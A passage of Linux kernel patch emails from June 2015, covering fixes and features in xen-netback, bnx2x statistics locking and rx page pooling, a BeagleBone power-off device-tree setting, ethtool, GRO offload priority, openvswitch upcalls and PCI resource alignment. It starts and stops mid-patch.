A modern Xen system only relies on the hotplug uevent for driver domains, when the backend is in the same domain as the toolstack it will run the necessary setup/teardown directly in the correct sequence wrt xenstore changes. Signed-off-by: Ian Campbell Acked-by: Wei Liu Signed-off-by: David S. Miller --- drivers/net/xen-netback/xenbus.c | 33 ++++++++++++++++++-------------- 1 file changed, 19 insertions(+), 14 deletions(-) diff --git a/drivers/net/xen-netback/xenbus.c b/drivers/net/xen-netback/xenbus.c index fee02414529e..968787abf78d 100644 --- a/drivers/net/xen-netback/xenbus.c +++ b/drivers/net/xen-netback/xenbus.c @@ -34,6 +34,8 @@ struct backend_info { enum xenbus_state frontend_state; struct xenbus_watch hotplug_status_watch; u8 have_hotplug_status_watch:1; + + const char *hotplug_script; }; static int connect_rings(struct backend_info *be, struct xenvif_queue *queue); @@ -238,6 +240,7 @@ static int netback_remove(struct xenbus_device *dev) xenvif_free(be->vif); be->vif = NULL; } + kfree(be->hotplug_script); kfree(be); dev_set_drvdata(&dev->dev, NULL); return 0; @@ -255,6 +258,7 @@ static int netback_probe(struct xenbus_device *dev, struct xenbus_transaction xbt; int err; int sg; + const char *script; struct backend_info *be = kzalloc(sizeof(struct backend_info), GFP_KERNEL); if (!be) { @@ -347,6 +351,15 @@ static int netback_probe(struct xenbus_device *dev, if (err) pr_debug("Error writing multi-queue-max-queues\n"); + script = xenbus_read(XBT_NIL, dev->nodename, "script", NULL); + if (IS_ERR(script)) { + err = PTR_ERR(script); + xenbus_dev_fatal(dev, err, "reading script"); + goto fail; + } + + be->hotplug_script = script; + err = xenbus_switch_state(dev, XenbusStateInitWait); if (err) goto fail; @@ -379,22 +392,14 @@ static int netback_uevent(struct xenbus_device *xdev, struct kobj_uevent_env *env) { struct backend_info *be = dev_get_drvdata(&xdev->dev); - char *val; - val = xenbus_read(XBT_NIL, xdev->nodename, "script", NULL); - if (IS_ERR(val)) { - int err = PTR_ERR(val); - xenbus_dev_fatal(xdev, err, "reading script"); - return err; - } else { - if (add_uevent_var(env, "script=%s", val)) { - kfree(val); - return -ENOMEM; - } - kfree(val); - } + if (!be) + return 0; + + if (add_uevent_var(env, "script=%s", be->hotplug_script)) + return -ENOMEM; - if (!be || !be->vif) + if (!be->vif) return 0; return add_uevent_var(env, "vif=%s", be->vif->dev->name); From c6e36d8c1a76be7a7afa2669483857dadec1e99c Mon Sep 17 00:00:00 2001 From: Yuval Mintz Date: Mon, 1 Jun 2015 15:08:18 +0300 Subject: [PATCH 559/872] bnx2x: Move statistics implementation into semaphores Commit dff173de84958 ("bnx2x: Fix statistics locking scheme") changed the bnx2x locking around statistics state into using a mutex - but the lock is being accessed via a timer which is forbidden. [If compiled with CONFIG_DEBUG_MUTEXES, logs show a warning about accessing the mutex in interrupt context] This moves the implementation into using a semaphore [with size '1'] instead. Signed-off-by: Yuval Mintz Signed-off-by: Ariel Elior Signed-off-by: David S. 
Miller --- drivers/net/ethernet/broadcom/bnx2x/bnx2x.h | 2 +- .../net/ethernet/broadcom/bnx2x/bnx2x_main.c | 9 +++++---- .../net/ethernet/broadcom/bnx2x/bnx2x_stats.c | 20 +++++++++++++------ 3 files changed, 20 insertions(+), 11 deletions(-) diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h index a3b0f7a0c61e..1f82a04ce01a 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h @@ -1774,7 +1774,7 @@ struct bnx2x { int stats_state; /* used for synchronization of concurrent threads statistics handling */ - struct mutex stats_lock; + struct semaphore stats_lock; /* used by dmae command loader */ struct dmae_command stats_dmae; diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c index fd52ce95127e..33501bcddc48 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c @@ -12054,7 +12054,7 @@ static int bnx2x_init_bp(struct bnx2x *bp) mutex_init(&bp->port.phy_mutex); mutex_init(&bp->fw_mb_mutex); mutex_init(&bp->drv_info_mutex); - mutex_init(&bp->stats_lock); + sema_init(&bp->stats_lock, 1); bp->drv_info_mng_owner = false; INIT_DELAYED_WORK(&bp->sp_task, bnx2x_sp_task); @@ -13690,9 +13690,10 @@ static int bnx2x_eeh_nic_unload(struct bnx2x *bp) cancel_delayed_work_sync(&bp->sp_task); cancel_delayed_work_sync(&bp->period_task); - mutex_lock(&bp->stats_lock); - bp->stats_state = STATS_STATE_DISABLED; - mutex_unlock(&bp->stats_lock); + if (!down_timeout(&bp->stats_lock, HZ / 10)) { + bp->stats_state = STATS_STATE_DISABLED; + up(&bp->stats_lock); + } bnx2x_save_statistics(bp); diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_stats.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_stats.c index 266b055c2360..69d699f0730a 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_stats.c +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_stats.c @@ -1372,19 +1372,23 @@ void bnx2x_stats_handle(struct bnx2x *bp, enum bnx2x_stats_event event) * that context in case someone is in the middle of a transition. * For other events, wait a bit until lock is taken. */ - if (!mutex_trylock(&bp->stats_lock)) { + if (down_trylock(&bp->stats_lock)) { if (event == STATS_EVENT_UPDATE) return; DP(BNX2X_MSG_STATS, "Unlikely stats' lock contention [event %d]\n", event); - mutex_lock(&bp->stats_lock); + if (unlikely(down_timeout(&bp->stats_lock, HZ / 10))) { + BNX2X_ERR("Failed to take stats lock [event %d]\n", + event); + return; + } } bnx2x_stats_stm[state][event].action(bp); bp->stats_state = bnx2x_stats_stm[state][event].next_state; - mutex_unlock(&bp->stats_lock); + up(&bp->stats_lock); if ((event != STATS_EVENT_UPDATE) || netif_msg_timer(bp)) DP(BNX2X_MSG_STATS, "state %d -> event %d -> state %d\n", @@ -1970,7 +1974,11 @@ int bnx2x_stats_safe_exec(struct bnx2x *bp, /* Wait for statistics to end [while blocking further requests], * then run supplied function 'safely'. */ - mutex_lock(&bp->stats_lock); + rc = down_timeout(&bp->stats_lock, HZ / 10); + if (unlikely(rc)) { + BNX2X_ERR("Failed to take statistics lock for safe execution\n"); + goto out_no_lock; + } bnx2x_stats_comp(bp); while (bp->stats_pending && cnt--) @@ -1988,7 +1996,7 @@ int bnx2x_stats_safe_exec(struct bnx2x *bp, /* No need to restart statistics - if they're enabled, the timer * will restart the statistics. 
*/ - mutex_unlock(&bp->stats_lock); - + up(&bp->stats_lock); +out_no_lock: return rc; } From 7a6cb0abe1aa63334f3ded6d2b6c8eca80e72302 Mon Sep 17 00:00:00 2001 From: Matthijs van Duin Date: Mon, 1 Jun 2015 21:33:28 +0200 Subject: [PATCH 560/872] ARM: dts: am335x-boneblack: disable RTC-only sleep to avoid hardware damage Avoid entering "RTC-only mode" at poweroff. It is unsupported by most versions of BeagleBone, and risks hardware damage. The damaging configuration is having system-power-controller without ti,pmic-shutdown-controller. Reported-by: Matthijs van Duin Tested-by: Matthijs van Duin Signed-off-by: Robert Nelson Cc: Tony Lindgren Cc: Felipe Balbi Cc: Johan Hovold [Matthijs van Duin: added explanatory comments] Signed-off-by: Matthijs van Duin Fixes: http://bugs.elinux.org/issues/143 Cc: stable@vger.kernel.org # v3.12+ [tony@atomide.com: updated comments with the hardware breaking info] Signed-off-by: Tony Lindgren --- arch/arm/boot/dts/am335x-bone-common.dtsi | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/arch/arm/boot/dts/am335x-bone-common.dtsi b/arch/arm/boot/dts/am335x-bone-common.dtsi index c3255e0c90aa..dbb3f4d2bf84 100644 --- a/arch/arm/boot/dts/am335x-bone-common.dtsi +++ b/arch/arm/boot/dts/am335x-bone-common.dtsi @@ -223,6 +223,25 @@ /include/ "tps65217.dtsi" &tps { + /* + * Configure pmic to enter OFF-state instead of SLEEP-state ("RTC-only + * mode") at poweroff. Most BeagleBone versions do not support RTC-only + * mode and risk hardware damage if this mode is entered. + * + * For details, see linux-omap mailing list May 2015 thread + * [PATCH] ARM: dts: am335x-bone* enable pmic-shutdown-controller + * In particular, messages: + * http://www.spinics.net/lists/linux-omap/msg118585.html + * http://www.spinics.net/lists/linux-omap/msg118615.html + * + * You can override this later with + * &tps { /delete-property/ ti,pmic-shutdown-controller; } + * if you want to use RTC-only mode and made sure you are not affected + * by the hardware problems. (Tip: double-check by performing a current + * measurement after shutdown: it should be less than 1 mA.) + */ + ti,pmic-shutdown-controller; + regulators { dcdc1_reg: regulator@0 { regulator-name = "vdds_dpr"; From 18ec898ee54e03a9aab8b54db50cb2b36209d313 Mon Sep 17 00:00:00 2001 From: "David S. Miller" Date: Mon, 1 Jun 2015 14:43:50 -0700 Subject: [PATCH 561/872] Revert "net: core: 'ethtool' issue with querying phy settings" This reverts commit f96dee13b8e10f00840124255bed1d8b4c6afd6f. It isn't right, ethtool is meant to manage one PHY instance per netdevice at a time, and this is selected by the SET command. Therefore by definition the GET command must only return the settings for the configured and selected PHY. Reported-by: Ben Hutchings Signed-off-by: David S. Miller --- net/core/ethtool.c | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/net/core/ethtool.c b/net/core/ethtool.c index 1347e11f5cc9..1d00b8922902 100644 --- a/net/core/ethtool.c +++ b/net/core/ethtool.c @@ -359,15 +359,7 @@ static int ethtool_get_settings(struct net_device *dev, void __user *useraddr) int err; struct ethtool_cmd cmd; - if (!dev->ethtool_ops->get_settings) - return -EOPNOTSUPP; - - if (copy_from_user(&cmd, useraddr, sizeof(cmd))) - return -EFAULT; - - cmd.cmd = ETHTOOL_GSET; - - err = dev->ethtool_ops->get_settings(dev, &cmd); + err = __ethtool_get_settings(dev, &cmd); if (err < 0) return err; From bdef7de4b8d9be4cf7bf5aea977f827310ab3ff0 Mon Sep 17 00:00:00 2001 From: "David S. 
Miller" Date: Mon, 1 Jun 2015 14:56:09 -0700 Subject: [PATCH 562/872] net: Add priority to packet_offload objects. When we scan a packet for GRO processing, we want to see the most common packet types in the front of the offload_base list. So add a priority field so we can handle this properly. IPv4/IPv6 get the highest priority with the implicit zero priority field. Next comes ethernet with a priority of 10, and then we have the MPLS types with a priority of 15. Suggested-by: Eric Dumazet Suggested-by: Toshiaki Makita Signed-off-by: David S. Miller --- include/linux/netdevice.h | 1 + net/core/dev.c | 8 ++++++-- net/ethernet/eth.c | 1 + net/mpls/mpls_gso.c | 2 ++ 4 files changed, 10 insertions(+), 2 deletions(-) diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h index 51f8d2f5dc3f..6f5f71ff5169 100644 --- a/include/linux/netdevice.h +++ b/include/linux/netdevice.h @@ -1997,6 +1997,7 @@ struct offload_callbacks { struct packet_offload { __be16 type; /* This is really htons(ether_type). */ + u16 priority; struct offload_callbacks callbacks; struct list_head list; }; diff --git a/net/core/dev.c b/net/core/dev.c index 594163d0c6eb..0602e917a305 100644 --- a/net/core/dev.c +++ b/net/core/dev.c @@ -469,10 +469,14 @@ EXPORT_SYMBOL(dev_remove_pack); */ void dev_add_offload(struct packet_offload *po) { - struct list_head *head = &offload_base; + struct packet_offload *elem; spin_lock(&offload_lock); - list_add_rcu(&po->list, head); + list_for_each_entry(elem, &offload_base, list) { + if (po->priority < elem->priority) + break; + } + list_add_rcu(&po->list, elem->list.prev); spin_unlock(&offload_lock); } EXPORT_SYMBOL(dev_add_offload); diff --git a/net/ethernet/eth.c b/net/ethernet/eth.c index c3325bd2f3fb..7d0e239a6755 100644 --- a/net/ethernet/eth.c +++ b/net/ethernet/eth.c @@ -470,6 +470,7 @@ EXPORT_SYMBOL(eth_gro_complete); static struct packet_offload eth_packet_offload __read_mostly = { .type = cpu_to_be16(ETH_P_TEB), + .priority = 10, .callbacks = { .gro_receive = eth_gro_receive, .gro_complete = eth_gro_complete, diff --git a/net/mpls/mpls_gso.c b/net/mpls/mpls_gso.c index 809df534a720..0183b32da942 100644 --- a/net/mpls/mpls_gso.c +++ b/net/mpls/mpls_gso.c @@ -62,6 +62,7 @@ static struct sk_buff *mpls_gso_segment(struct sk_buff *skb, static struct packet_offload mpls_mc_offload __read_mostly = { .type = cpu_to_be16(ETH_P_MPLS_MC), + .priority = 15, .callbacks = { .gso_segment = mpls_gso_segment, }, @@ -69,6 +70,7 @@ static struct packet_offload mpls_mc_offload __read_mostly = { static struct packet_offload mpls_uc_offload __read_mostly = { .type = cpu_to_be16(ETH_P_MPLS_UC), + .priority = 15, .callbacks = { .gso_segment = mpls_gso_segment, }, From ccea74457bbdafe33dce8bffcb5cb183aeb5f2bb Mon Sep 17 00:00:00 2001 From: Neil McKee Date: Tue, 26 May 2015 20:59:43 -0700 Subject: [PATCH 563/872] openvswitch: include datapath actions with sampled-packet upcall to userspace If new optional attribute OVS_USERSPACE_ATTR_ACTIONS is added to an OVS_ACTION_ATTR_USERSPACE action, then include the datapath actions in the upcall. This Directly associates the sampled packet with the path it takes through the virtual switch. Path information currently includes mangling, encapsulation and decapsulation actions for tunneling protocols GRE, VXLAN, Geneve, MPLS and QinQ, but this extension requires no further changes to accommodate datapath actions that may be added in the future. Adding path information enhances visibility into complex virtual networks. 
Signed-off-by: Neil McKee Signed-off-by: David S. Miller --- include/uapi/linux/openvswitch.h | 4 ++++ net/openvswitch/actions.c | 23 +++++++++++++++-------- net/openvswitch/datapath.c | 18 ++++++++++++++++-- net/openvswitch/datapath.h | 2 ++ 4 files changed, 37 insertions(+), 10 deletions(-) diff --git a/include/uapi/linux/openvswitch.h b/include/uapi/linux/openvswitch.h index bbd49a0c46c7..1dab77601c21 100644 --- a/include/uapi/linux/openvswitch.h +++ b/include/uapi/linux/openvswitch.h @@ -153,6 +153,8 @@ enum ovs_packet_cmd { * flow key against the kernel's. * @OVS_PACKET_ATTR_ACTIONS: Contains actions for the packet. Used * for %OVS_PACKET_CMD_EXECUTE. It has nested %OVS_ACTION_ATTR_* attributes. + * Also used in upcall when %OVS_ACTION_ATTR_USERSPACE has optional + * %OVS_USERSPACE_ATTR_ACTIONS attribute. * @OVS_PACKET_ATTR_USERDATA: Present for an %OVS_PACKET_CMD_ACTION * notification if the %OVS_ACTION_ATTR_USERSPACE action specified an * %OVS_USERSPACE_ATTR_USERDATA attribute, with the same length and content @@ -528,6 +530,7 @@ enum ovs_sample_attr { * copied to the %OVS_PACKET_CMD_ACTION message as %OVS_PACKET_ATTR_USERDATA. * @OVS_USERSPACE_ATTR_EGRESS_TUN_PORT: If present, u32 output port to get * tunnel info. + * @OVS_USERSPACE_ATTR_ACTIONS: If present, send actions with upcall. */ enum ovs_userspace_attr { OVS_USERSPACE_ATTR_UNSPEC, @@ -535,6 +538,7 @@ enum ovs_userspace_attr { OVS_USERSPACE_ATTR_USERDATA, /* Optional user-specified cookie. */ OVS_USERSPACE_ATTR_EGRESS_TUN_PORT, /* Optional, u32 output port * to get tunnel info. */ + OVS_USERSPACE_ATTR_ACTIONS, /* Optional flag to get actions. */ __OVS_USERSPACE_ATTR_MAX }; diff --git a/net/openvswitch/actions.c b/net/openvswitch/actions.c index b491c1c296fe..8a8c0b8b4f63 100644 --- a/net/openvswitch/actions.c +++ b/net/openvswitch/actions.c @@ -608,17 +608,16 @@ static void do_output(struct datapath *dp, struct sk_buff *skb, int out_port) } static int output_userspace(struct datapath *dp, struct sk_buff *skb, - struct sw_flow_key *key, const struct nlattr *attr) + struct sw_flow_key *key, const struct nlattr *attr, + const struct nlattr *actions, int actions_len) { struct ovs_tunnel_info info; struct dp_upcall_info upcall; const struct nlattr *a; int rem; + memset(&upcall, 0, sizeof(upcall)); upcall.cmd = OVS_PACKET_CMD_ACTION; - upcall.userdata = NULL; - upcall.portid = 0; - upcall.egress_tun_info = NULL; for (a = nla_data(attr), rem = nla_len(attr); rem > 0; a = nla_next(a, &rem)) { @@ -647,6 +646,13 @@ static int output_userspace(struct datapath *dp, struct sk_buff *skb, break; } + case OVS_USERSPACE_ATTR_ACTIONS: { + /* Include actions. */ + upcall.actions = actions; + upcall.actions_len = actions_len; + break; + } + } /* End of switch. 
*/ } @@ -654,7 +660,8 @@ static int output_userspace(struct datapath *dp, struct sk_buff *skb, } static int sample(struct datapath *dp, struct sk_buff *skb, - struct sw_flow_key *key, const struct nlattr *attr) + struct sw_flow_key *key, const struct nlattr *attr, + const struct nlattr *actions, int actions_len) { const struct nlattr *acts_list = NULL; const struct nlattr *a; @@ -688,7 +695,7 @@ static int sample(struct datapath *dp, struct sk_buff *skb, */ if (likely(nla_type(a) == OVS_ACTION_ATTR_USERSPACE && nla_is_last(a, rem))) - return output_userspace(dp, skb, key, a); + return output_userspace(dp, skb, key, a, actions, actions_len); skb = skb_clone(skb, GFP_ATOMIC); if (!skb) @@ -872,7 +879,7 @@ static int do_execute_actions(struct datapath *dp, struct sk_buff *skb, break; case OVS_ACTION_ATTR_USERSPACE: - output_userspace(dp, skb, key, a); + output_userspace(dp, skb, key, a, attr, len); break; case OVS_ACTION_ATTR_HASH: @@ -916,7 +923,7 @@ static int do_execute_actions(struct datapath *dp, struct sk_buff *skb, break; case OVS_ACTION_ATTR_SAMPLE: - err = sample(dp, skb, key, a); + err = sample(dp, skb, key, a, attr, len); break; } diff --git a/net/openvswitch/datapath.c b/net/openvswitch/datapath.c index 3b90461317ec..ff8c4a4c1609 100644 --- a/net/openvswitch/datapath.c +++ b/net/openvswitch/datapath.c @@ -272,10 +272,9 @@ void ovs_dp_process_packet(struct sk_buff *skb, struct sw_flow_key *key) struct dp_upcall_info upcall; int error; + memset(&upcall, 0, sizeof(upcall)); upcall.cmd = OVS_PACKET_CMD_MISS; - upcall.userdata = NULL; upcall.portid = ovs_vport_find_upcall_portid(p, skb); - upcall.egress_tun_info = NULL; error = ovs_dp_upcall(dp, skb, key, &upcall); if (unlikely(error)) kfree_skb(skb); @@ -397,6 +396,10 @@ static size_t upcall_msg_size(const struct dp_upcall_info *upcall_info, if (upcall_info->egress_tun_info) size += nla_total_size(ovs_tun_key_attr_size()); + /* OVS_PACKET_ATTR_ACTIONS */ + if (upcall_info->actions_len) + size += nla_total_size(upcall_info->actions_len); + return size; } @@ -478,6 +481,17 @@ static int queue_userspace_packet(struct datapath *dp, struct sk_buff *skb, nla_nest_end(user_skb, nla); } + if (upcall_info->actions_len) { + nla = nla_nest_start(user_skb, OVS_PACKET_ATTR_ACTIONS); + err = ovs_nla_put_actions(upcall_info->actions, + upcall_info->actions_len, + user_skb); + if (!err) + nla_nest_end(user_skb, nla); + else + nla_nest_cancel(user_skb, nla); + } + /* Only reserve room for attribute header, packet data is added * in skb_zerocopy() */ if (!(nla = nla_reserve(user_skb, OVS_PACKET_ATTR_PACKET, 0))) { diff --git a/net/openvswitch/datapath.h b/net/openvswitch/datapath.h index 4ec4a480b147..cd691e935e08 100644 --- a/net/openvswitch/datapath.h +++ b/net/openvswitch/datapath.h @@ -116,6 +116,8 @@ struct ovs_skb_cb { struct dp_upcall_info { const struct ovs_tunnel_info *egress_tun_info; const struct nlattr *userdata; + const struct nlattr *actions; + int actions_len; u32 portid; u8 cmd; }; From 552bc94ebeeb189d0ac682dae95cf05e6b72d7fd Mon Sep 17 00:00:00 2001 From: Yinghai Lu Date: Thu, 28 May 2015 22:40:00 -0700 Subject: [PATCH 564/872] PCI: Preserve resource size during alignment reordering In d74b9027a4da ("PCI: Consider additional PF's IOV BAR alignment in sizing and assigning"), we store additional alignment in realloc_head and take this into consideration for assignment. In __assign_resources_sorted(), we changed dev_res->res->start, then used resource_start() (which depends on res->start), so the recomputed res->end was completely bogus. 
Even if we'd had the correct size, the end would have been off by one. Preserve the resource size when we adjust its alignment. [bhelgaas: changelog] Fixes: d74b9027a4da ("PCI: Consider additional PF's IOV BAR alignment in sizing and assigning") Signed-off-by: Yinghai Lu Signed-off-by: Bjorn Helgaas Acked-by: Wei Yang CC: Benjamin Herrenschmidt --- drivers/pci/setup-bus.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/pci/setup-bus.c b/drivers/pci/setup-bus.c index aa281d909eb0..508cc56130e3 100644 --- a/drivers/pci/setup-bus.c +++ b/drivers/pci/setup-bus.c @@ -428,9 +428,10 @@ static void __assign_resources_sorted(struct list_head *head, * consistent. */ if (add_align > dev_res->res->start) { + resource_size_t r_size = resource_size(dev_res->res); + dev_res->res->start = add_align; - dev_res->res->end = add_align + - resource_size(dev_res->res); + dev_res->res->end = add_align + r_size - 1; list_for_each_entry(dev_res2, head, list) { align = pci_resource_alignment(dev_res2->dev, From 4cace675d687ebd2d813e90af80ff87ee85202f9 Mon Sep 17 00:00:00 2001 From: Gabriel Krisman Bertazi Date: Wed, 27 May 2015 13:51:43 -0300 Subject: [PATCH 565/872] bnx2x: Alloc 4k fragment for each rx ring buffer element The driver allocates one page for each buffer on the rx ring, which is too much on architectures like ppc64 and can cause unexpected allocation failures when the system is under stress. Now, we keep a memory pool per queue, and if the architecture's PAGE_SIZE is greater than 4k, we fragment pages and assign each 4k segment to a ring element, which reduces the overall memory consumption on such architectures. This helps avoiding errors like the example below: [bnx2x_alloc_rx_sge:435(eth1)]Can't alloc sge [c00000037ffeb900] [d000000075eddeb4] .bnx2x_alloc_rx_sge+0x44/0x200 [bnx2x] [c00000037ffeb9b0] [d000000075ee0b34] .bnx2x_fill_frag_skb+0x1ac/0x460 [bnx2x] [c00000037ffebac0] [d000000075ee11f0] .bnx2x_tpa_stop+0x160/0x2e8 [bnx2x] [c00000037ffebb90] [d000000075ee1560] .bnx2x_rx_int+0x1e8/0xc30 [bnx2x] [c00000037ffebcd0] [d000000075ee2084] .bnx2x_poll+0xdc/0x3d8 [bnx2x] (unreliable) Signed-off-by: Gabriel Krisman Bertazi Acked-by: Yuval Mintz Reviewed-by: Lino Sanfilippo Signed-off-by: David S. 
Miller --- drivers/net/ethernet/broadcom/bnx2x/bnx2x.h | 16 +++++- .../net/ethernet/broadcom/bnx2x/bnx2x_cmn.c | 57 +++++++++++++------ .../net/ethernet/broadcom/bnx2x/bnx2x_cmn.h | 31 +++++++++- 3 files changed, 80 insertions(+), 24 deletions(-) diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h index a3b0f7a0c61e..2ed4c0af595b 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h @@ -357,6 +357,7 @@ struct sw_tx_bd { struct sw_rx_page { struct page *page; DEFINE_DMA_UNMAP_ADDR(mapping); + unsigned int offset; }; union db_prod { @@ -381,9 +382,10 @@ union db_prod { #define PAGES_PER_SGE_SHIFT 0 #define PAGES_PER_SGE (1 << PAGES_PER_SGE_SHIFT) -#define SGE_PAGE_SIZE PAGE_SIZE -#define SGE_PAGE_SHIFT PAGE_SHIFT -#define SGE_PAGE_ALIGN(addr) PAGE_ALIGN((typeof(PAGE_SIZE))(addr)) +#define SGE_PAGE_SHIFT 12 +#define SGE_PAGE_SIZE (1 << SGE_PAGE_SHIFT) +#define SGE_PAGE_MASK (~(SGE_PAGE_SIZE - 1)) +#define SGE_PAGE_ALIGN(addr) (((addr) + SGE_PAGE_SIZE - 1) & SGE_PAGE_MASK) #define SGE_PAGES (SGE_PAGE_SIZE * PAGES_PER_SGE) #define TPA_AGG_SIZE min_t(u32, (min_t(u32, 8, MAX_SKB_FRAGS) * \ SGE_PAGES), 0xffff) @@ -526,6 +528,12 @@ enum bnx2x_tpa_mode_t { TPA_MODE_GRO }; +struct bnx2x_alloc_pool { + struct page *page; + dma_addr_t dma; + unsigned int offset; +}; + struct bnx2x_fastpath { struct bnx2x *bp; /* parent */ @@ -599,6 +607,8 @@ struct bnx2x_fastpath { 4 (for the digits and to make it DWORD aligned) */ #define FP_NAME_SIZE (sizeof(((struct net_device *)0)->name) + 8) char name[FP_NAME_SIZE]; + + struct bnx2x_alloc_pool page_pool; }; #define bnx2x_fp(bp, nr, var) ((bp)->fp[(nr)].var) diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c index 2ef202d10948..e2a65334708d 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c @@ -544,30 +544,49 @@ static void bnx2x_set_gro_params(struct sk_buff *skb, u16 parsing_flags, static int bnx2x_alloc_rx_sge(struct bnx2x *bp, struct bnx2x_fastpath *fp, u16 index, gfp_t gfp_mask) { - struct page *page = alloc_pages(gfp_mask, PAGES_PER_SGE_SHIFT); struct sw_rx_page *sw_buf = &fp->rx_page_ring[index]; struct eth_rx_sge *sge = &fp->rx_sge_ring[index]; + struct bnx2x_alloc_pool *pool = &fp->page_pool; dma_addr_t mapping; - if (unlikely(page == NULL)) { - BNX2X_ERR("Can't alloc sge\n"); - return -ENOMEM; - } + if (!pool->page || (PAGE_SIZE - pool->offset) < SGE_PAGE_SIZE) { - mapping = dma_map_page(&bp->pdev->dev, page, 0, - SGE_PAGES, DMA_FROM_DEVICE); - if (unlikely(dma_mapping_error(&bp->pdev->dev, mapping))) { - __free_pages(page, PAGES_PER_SGE_SHIFT); - BNX2X_ERR("Can't map sge\n"); - return -ENOMEM; + /* put page reference used by the memory pool, since we + * won't be using this page as the mempool anymore. 
+ */ + if (pool->page) + put_page(pool->page); + + pool->page = alloc_pages(gfp_mask, PAGES_PER_SGE_SHIFT); + if (unlikely(!pool->page)) { + BNX2X_ERR("Can't alloc sge\n"); + return -ENOMEM; + } + + pool->dma = dma_map_page(&bp->pdev->dev, pool->page, 0, + PAGE_SIZE, DMA_FROM_DEVICE); + if (unlikely(dma_mapping_error(&bp->pdev->dev, + pool->dma))) { + __free_pages(pool->page, PAGES_PER_SGE_SHIFT); + pool->page = NULL; + BNX2X_ERR("Can't map sge\n"); + return -ENOMEM; + } + pool->offset = 0; } - sw_buf->page = page; + get_page(pool->page); + sw_buf->page = pool->page; + sw_buf->offset = pool->offset; + + mapping = pool->dma + sw_buf->offset; dma_unmap_addr_set(sw_buf, mapping, mapping); sge->addr_hi = cpu_to_le32(U64_HI(mapping)); sge->addr_lo = cpu_to_le32(U64_LO(mapping)); + pool->offset += SGE_PAGE_SIZE; + return 0; } @@ -629,20 +648,22 @@ static int bnx2x_fill_frag_skb(struct bnx2x *bp, struct bnx2x_fastpath *fp, return err; } - /* Unmap the page as we're going to pass it to the stack */ - dma_unmap_page(&bp->pdev->dev, - dma_unmap_addr(&old_rx_pg, mapping), - SGE_PAGES, DMA_FROM_DEVICE); + dma_unmap_single(&bp->pdev->dev, + dma_unmap_addr(&old_rx_pg, mapping), + SGE_PAGE_SIZE, DMA_FROM_DEVICE); /* Add one frag and update the appropriate fields in the skb */ if (fp->mode == TPA_MODE_LRO) - skb_fill_page_desc(skb, j, old_rx_pg.page, 0, frag_len); + skb_fill_page_desc(skb, j, old_rx_pg.page, + old_rx_pg.offset, frag_len); else { /* GRO */ int rem; int offset = 0; for (rem = frag_len; rem > 0; rem -= gro_size) { int len = rem > gro_size ? gro_size : rem; skb_fill_page_desc(skb, frag_id++, - old_rx_pg.page, offset, len); + old_rx_pg.page, + old_rx_pg.offset + offset, + len); if (offset) get_page(old_rx_pg.page); offset += len; diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h index d7a71758e876..2b30081ec26d 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h @@ -804,9 +804,13 @@ static inline void bnx2x_free_rx_sge(struct bnx2x *bp, if (!page) return; - dma_unmap_page(&bp->pdev->dev, dma_unmap_addr(sw_buf, mapping), - SGE_PAGES, DMA_FROM_DEVICE); - __free_pages(page, PAGES_PER_SGE_SHIFT); + /* Since many fragments can share the same page, make sure to + * only unmap and free the page once. + */ + dma_unmap_single(&bp->pdev->dev, dma_unmap_addr(sw_buf, mapping), + SGE_PAGE_SIZE, DMA_FROM_DEVICE); + + put_page(page); sw_buf->page = NULL; sge->addr_hi = 0; @@ -964,6 +968,25 @@ static inline void bnx2x_set_fw_mac_addr(__le16 *fw_hi, __le16 *fw_mid, ((u8 *)fw_lo)[1] = mac[4]; } +static inline void bnx2x_free_rx_mem_pool(struct bnx2x *bp, + struct bnx2x_alloc_pool *pool) +{ + if (!pool->page) + return; + + /* Page was not fully fragmented. 
Unmap unused space */ + if (pool->offset < PAGE_SIZE) { + dma_addr_t dma = pool->dma + pool->offset; + int size = PAGE_SIZE - pool->offset; + + dma_unmap_single(&bp->pdev->dev, dma, size, DMA_FROM_DEVICE); + } + + put_page(pool->page); + + pool->page = NULL; +} + static inline void bnx2x_free_rx_sge_range(struct bnx2x *bp, struct bnx2x_fastpath *fp, int last) { @@ -974,6 +997,8 @@ static inline void bnx2x_free_rx_sge_range(struct bnx2x *bp, for (i = 0; i < last; i++) bnx2x_free_rx_sge(bp, fp, i); + + bnx2x_free_rx_mem_pool(bp, &fp->page_pool); } static inline void bnx2x_set_next_page_rx_bd(struct bnx2x_fastpath *fp) From ccd740cbc6e01b2a08baa341867063ed2887f4b9 Mon Sep 17 00:00:00 2001 From: Steffen Klassert Date: Fri, 29 May 2015 11:28:26 -0700 Subject: [PATCH 566/872] vti6: Add pmtu handling to vti6_xmit. We currently rely on the PMTU discovery of xfrm. However if a packet is localy sent, the PMTU mechanism of xfrm tries to to local socket notification what might not work for applications like 